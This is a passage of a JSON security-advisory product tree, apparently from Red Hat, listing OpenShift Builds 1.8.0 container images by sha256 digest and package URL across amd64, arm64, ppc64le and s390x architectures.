"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ab22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3Ab63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3Acf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-operator-bundle@sha256%3Ab5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778684489"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3A397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Ac918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ac295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Afd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be?arch=arm64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3A77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3Ab662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3Ab40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3Ab4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3A27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3A630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Af38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3A53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3A45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682932"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778674829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-rhel9@sha256%3A0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-shared-resource-webhook-rhel9@sha256%3Ad91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778671008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-waiters-rhel9@sha256%3A2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682930"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-webhook-rhel9@sha256%3Af6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778682920"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
